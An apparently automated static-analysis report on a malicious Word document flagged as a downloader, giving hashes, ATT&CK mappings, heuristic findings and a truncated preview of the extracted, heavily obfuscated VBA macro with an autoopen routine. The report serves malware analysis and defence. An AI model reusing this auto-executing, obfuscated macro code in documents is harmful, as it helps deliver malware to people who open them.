Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 566c79acc5b6aca2…

MALICIOUS

Office (OLE)

Size: 195.6 KB
Created: 2019-04-17 11:21:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 1668136a81b0943205f6eb6bc27a42d8
SHA-1: 27c0b89f388e12b53667a0e3f50b6217e6418b57
SHA-256: 566c79acc5b6aca21ec8ad0859b2f53a1f0d4a00e793b4e6cba5fdb53cb2bafa
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. Heuristics indicate obfuscation techniques and the use of GetObject to execute code, likely to download and run a second-stage payload. The macro attempts to reassemble the string 'Win32_Process', suggesting an intent to interact with running processes.

Heuristics (8)

  • ClamAV: Doc.Downloader.00536d-6944297-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6944297-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28550 bytes
SHA-256: 5a0d220e71aa010401d5ebe483a3f0e3753e4e82cde16bbe15486a13eea1a867

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "lQ4DxX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "joAXZA"
Attribute VB_Base = "0{6CCF1993-C999-4F57-B273-ED66A87AD96E}{5092B10A-12CB-49F0-8E07-C503D9BA76D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "nQAAQ_"
Attribute VB_Base = "0{15E255D2-EF37-42AA-98CC-BF757E6A8AC9}{2F84DC7F-1C21-4B22-96B5-F501EE8894E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "skAAA44"
Sub autoopen()
   If mBB_UkB = FABAAUxC Then
    NUBkAQxw = 40652062 * wAAXQwC
  ElseIf SAxX_AQU = hAwQGC Then
    Set aUUoQAA = V4_XDQ
  ElseIf GUAAAw = mADADQ Then
   oA_x_DBo = HQAkB1 / cwwQQZk * FCUAAD + Sqr(h1woQkA)
  ElseIf DAZ4QDA = BAcGcA Then
   XCCZZA = 27339839
End If
   If zGCAA_ = WC4GABx Then
    IBCAcA = 427739662 * DZ41AB
  ElseIf wZcBkZAw = wXZAGc_A Then
    Set oxAZ_cUw = KQAG4Q
  ElseIf CDwx4Q = iABAAZ Then
   KCA_Uk = WXUAABA / NXAZQUA * RGUXAU + Sqr(YA1cAAA)
  ElseIf VAAQAxU = QoUAQQA Then
   WkAoxkoD = 73589769
End If
   If YUAUGkAB = fZQU_CUQ Then
    oUAABUA = 312282061 * UZAU_C
  ElseIf ZUAGUGw = iwkU1ZD Then
    Set hGBCACDA = iDwQBB
  ElseIf VDcDUcD = TBDxQ_ Then
   XUQAwA = FxcDG1 / ACBAB1 * iBcA1kA + Sqr(NUAAAXQ)
  ElseIf PCUkUDGA = hoAABCA Then
   AxccDAA = 907020580
End If
nXQ4AD
   If HxBAAAw = XQCDAw Then
    RAcQCc = 583652363 * FBGUUoUG
  ElseIf Q4_AAA = vQBAoADD Then
    Set vXAcCU = RDAoBG4
  ElseIf UBUAkB = RoGUZAAA Then
   YAAGQwkD = BcABCocw / pAAA4BxC * kAAAAA + Sqr(EZAxkQAD)
  ElseIf mADkD1Ck = CCXXAU Then
   hAGACAkA = 767101096
End If
   If wDxAAAw = E_QAABB Then
    rCABAAC = 832649815 * GAw1oD
  ElseIf Z1o4G1DZ = LA44AA Then
    Set cUCwoA = pxoXGc
  ElseIf EDZwAZ = cA4xQZx Then
   oBBBAA = dZAAAQA1 / CAoBAC1 * lGB1xA + Sqr(VXABCC1U)
  ElseIf A_wDAxc = QCQAQB Then
   NxwAUAAB = 76026590
End If
   If cUZAQA1 = o1A1Qcw1 Then
    V__AXG = 739424599 * TAAoBAXA
  ElseIf JDXCABkG = zQGUBQxD Then
    Set zAwAQA = MABDBQQ
  ElseIf aXDAxA = iGAAAkkA Then
   TAAXABAU = tAAAA1 / GwcAUQXc * KA_AAA + Sqr(YABQA4A)
  ElseIf jZxQA4 = rAA_wc Then
   iXAAwkUw = 185960431
End If
End Sub

Attribute VB_Name = "jAkXXX"
Function nXQ4AD()
On Error Resume Next
   If TDCABBA = RZUUZD4D Then
    HZk1cAA = 111488983 * zxDwAX
  ElseIf lDkQZxU = i1BxABcU Then
    Set DcA1_G = RAAQ1AwG
  ElseIf SckAUA = JwAADZAC Then
   PDGDUDA = HxkQDAG / GA1AUG * AoQGUDB + Sqr(jAA1ABB)
  ElseIf pAAQAUX = WDZDx4DA Then
   tAA1Axk = 8828071
End If
   If GUcAQ1QX = qok1ABo Then
    IcXCAxAk = 433040459 * nDAxDAw
  ElseIf nGowACQx = q4wZcQCQ Then
    Set ZADw_AU = vD4kUA
  ElseIf zQGwxc = tQ4BAA Then
   VU4BGAUw = LQw_AD_G / hk_XQD4w * q_UUUc + Sqr(WwD_ZDQA)
  ElseIf lAD4_UA = Wx4AXD_D Then
   bQBAQw = 763825975
End If
   If jAZQkx4 = PcGDkAD Then
    NUBcAAk = 110199077 * MAcX4QQ
  ElseIf bBkUGA = T_ABZQQZ Then
    Set jAAGxAkA = pAADAA
  ElseIf HAoDQCAG = nAAGABAQ Then
   dZAx_AcA = nBAAD_ / GQAAoX * ukAwXAQ + Sqr(iABoACA)
  ElseIf JXUAADZ = jcw4DkA Then
   DUDZxXAU = 418060932
End If
If 7304 < 17404 Then
VABXAA = vbFalse
   If fGBDAcAo = Vw_BAA Then
    YAwA_XQA = 288468827 * F4AAAkwX
  ElseIf uAAwXAkQ = nZXAwGQ Then
    Set qXGUAx_ = BAwAwk
  ElseIf wB1AUU = J4AoAQA Then
   UZwGAwUU = WwZAA4CU / MAABCAAx * NAw_BAD + Sqr(SB_AGUw)
  ElseIf U1oDDkB = iU4QUw4_ Then
   CAUw1A = 877920435
End If
   If dUA4CUD = r1UAAZ_A Then
    wBADAAUA = 350890717 * jQAAZAQA
  ElseIf zxQABU = rcAGBQ4 Then
    Set lXBCcUA = ZAQAAAQQ
  ElseIf kBDUAAZU = jUAXBAAD Then
   
... (truncated)